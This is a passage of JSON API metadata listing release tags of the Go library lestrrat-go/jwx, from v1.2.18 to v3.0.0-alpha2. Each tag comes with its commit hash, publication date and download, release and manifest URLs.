0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/